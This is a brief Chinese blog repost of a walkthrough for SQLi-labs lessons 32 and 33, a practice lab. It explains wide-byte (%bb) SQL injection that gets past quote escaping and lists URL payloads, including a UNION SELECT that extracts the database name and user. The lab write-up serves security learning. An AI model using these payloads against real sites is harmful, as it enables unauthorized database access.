其他分享
首页 > 其他分享> > Less32-Less-33

Less32-Less-33

作者:互联网

0x01 判断注入点

宽字节注入,过滤掉'(使用php函数将'转义)
输入',"都显示正常
判断宽字节注入

?id=1%bb%27


或者

?id=1%bb%5c%5c%27--+

0x02判断数据库名

后面就正常注入

?id=-1%bb%5c%5c%27 union select 1,database(),user()--+

0x03 Less-33

33关同样的方法绕过

?id=1%bb%27--+

?id=0%bb%5c%5c%27 union select 1,database(),user()--+

标签:27,Less,33,bb%,5c%,1%,--+,Less32,id
来源: https://www.cnblogs.com/observering/p/13728993.html